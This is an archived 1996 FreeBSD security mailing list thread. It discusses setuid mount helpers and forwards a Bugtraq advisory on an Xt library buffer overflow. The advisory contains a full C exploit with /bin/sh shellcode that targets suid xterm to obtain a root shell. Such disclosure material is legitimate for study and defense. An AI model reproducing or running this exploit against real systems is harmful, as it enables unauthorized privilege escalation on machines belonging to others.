Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id EAA28460 for security-outgoing; Sat, 24 Aug 1996 04:23:30 -0700 (PDT) Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.2.228.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id EAA28454 for ; Sat, 24 Aug 1996 04:23:20 -0700 (PDT) Received: (from bde@localhost) by godzilla.zeta.org.au (8.6.12/8.6.9) id VAA25541; Sat, 24 Aug 1996 21:21:00 +1000 Date: Sat, 24 Aug 1996 21:21:00 +1000 From: Bruce Evans Message-Id: <199608241121.VAA25541@godzilla.zeta.org.au> To: guido@gvr.win.tue.nl, julian@whistle.com Subject: Re: [Fwd: mount bug..] Cc: security@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >Julian Elischer wrote: >> This doesn't work, but I'm wondering why it says it's for freeBSD.. >> did it work on an earlier version? (even with bin replaced by sbin) >> >> umount is not suid anyhow, but..... >> does anyone know about this? >Since they use umount to do the exploit I cannot imagine how they would >ever get a root shell....umount is not suid. Neither is mount. IIRC, among our mount routines, only mount_msdos and mount_union have ever been setuid. Only mount_msdos is setuid now. msdosfs alone allows mounting if the real uid is 0 or the real uid matches the proposed mount point's uid. msdosfs_mount has to be setuid root to defeat the suser check() in mount(). Blech. Controlling things using the permissions mount point may be good, but it shouldn't be special. Bruce From owner-freebsd-security Sat Aug 24 13:05:29 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA25349 for security-outgoing; Sat, 24 Aug 1996 13:05:29 -0700 (PDT) Received: from silcon.silcon.com (silcon.silcon.com [206.99.109.10]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA25343 for ; Sat, 24 Aug 1996 13:05:25 -0700 (PDT) Received: (from dmessiah@localhost) by silcon.silcon.com (8.7.5/8.6.9) id NAA17984; Sat, 24 Aug 1996 13:05:59 -0700 (PDT) Date: Sat, 24 Aug 1996 13:05:59 -0700 (PDT) From: Evan Brewer X-Sender: dmessiah@silcon To: freebsd-security@freebsd.org Subject: possible mailing list Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk subscribe dmessiah@silcon.com From owner-freebsd-security Sat Aug 24 15:44:40 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA06089 for security-outgoing; Sat, 24 Aug 1996 15:44:40 -0700 (PDT) Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA06080 for ; Sat, 24 Aug 1996 15:44:38 -0700 (PDT) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id PAA11910; Sat, 24 Aug 1996 15:43:59 -0700 (PDT) Received: from current1.whistle.com(207.76.205.22) by whistle.com via smap (V1.3) id sma011906; Sat Aug 24 15:43:33 1996 Message-ID: <321F855A.7A5F06AF@whistle.com> Date: Sat, 24 Aug 1996 15:42:34 -0700 From: Julian Elischer Organization: Whistle Communications X-Mailer: Mozilla 3.0b6 (X11; I; FreeBSD 2.2-CURRENT i386) MIME-Version: 1.0 To: Guido van Rooij CC: security@freebsd.org Subject: Re: [Fwd: mount bug..] References: <199608241013.MAA04792@gvr.win.tue.nl> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Guido van Rooij wrote: > > Julian Elischer wrote: > > This doesn't work, but I'm wondering why it says it's for freeBSD.. > > did it work on an earlier version? (even with bin replaced by sbin) > > > > umount is not suid anyhow, but..... > > does anyone know about this? > > Since they use umount to do the exploit I cannot imagine how they would > ever get a root shell....umount is not suid. > > -Guido I saw that and agree, I'm just puzzled by it.... From owner-freebsd-security Sat Aug 24 23:05:24 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA10085 for security-outgoing; Sat, 24 Aug 1996 23:05:24 -0700 (PDT) Received: from gwydion.hns.st-louis.mo.us (kenth@dialup-34.hunter.com [199.217.148.34]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA10079 for ; Sat, 24 Aug 1996 23:05:18 -0700 (PDT) Received: (from kenth@localhost) by gwydion.hns.st-louis.mo.us (8.7.5/8.7.3) id BAA22181 for freebsd-security@freebsd.org; Sun, 25 Aug 1996 01:05:20 -0500 (CDT) From: Kent Hamilton Message-Id: <199608250605.BAA22181@gwydion.hns.st-louis.mo.us> Subject: Vulnerability in the Xt library (fwd) To: freebsd-security@freebsd.org Date: Sun, 25 Aug 1996 01:05:20 -0500 (CDT) X-Mailer: ELM [version 2.4 PL24 ME8a] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Thought this might be of interest. ----- Forwarded message from Aleph One ----- >From NETSPACE.ORG!owner-bugtraq@scsgate.scscom.com Sat Aug 24 11:50:51 1996 Sender: NETSPACE.ORG!owner-bugtraq@scsgate.scscom.com Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Approved-By: Aleph One Message-Id: Date: Sat, 24 Aug 1996 02:14:24 -0700 Reply-To: Bugtraq List Sender: Bugtraq List From: Aleph One Subject: Vulnerability in the Xt library X-Cc: xfree86@xfree86.org, jff@x.org, matt@x.org, xbugs@x.org, gildea@x.org To: Multiple recipients of list BUGTRAQ There exists at least one vulnerability in the Xt library caused by a buffer overrun that allows arbitrary code to be executed. This vulnerability exists in the Xt library itself. As such all programs linked with it that are suid root or can be coerced into running as root are vulnerable. The standard example is of curse suid xterm. The vulnerability has been confirmed under FreeBSD, Solaris, and as far as we can tell every single other OS running all revisions of X11. There exists a large number of places in the Xt library code where buffers allocated on the stack are handled insecurly other than the one used on the fallowing exploit. The Xt library is a can of worms. The original author of this vulnerability is "b0z0 bra1n". x86 exploit tested under FreeBSD fallows. For other x86 operating systems play around with the offset: #include #include #include #define DEFAULT_OFFSET 0 #define BUFFER_SIZE 1491 long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char **argv) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0" "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50" "\xeb\x18" "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02" "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04"; int i, ofs=DEFAULT_OFFSET, bs=BUFFER_SIZE; if(argc>1) ofs=atoi(argv[1]); if(argc>2) bs=atoi(argv[2]); printf("Using offset of esp + %d (%x)\nBuffer size %d\n", ofs, get_esp()+ofs, bs); buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, bs-strlen(execshell)); ptr += bs-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL); } Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 ----- End of forwarded message from Aleph One ----- -- Kent Hamilton Play: KentH@HNS.St-Louis.MO.US NIC Handle: KH91 URL: http://www.icon-stl.net/~khamilto/ Blessed Be.... Work: KHamilton@Hunter.COM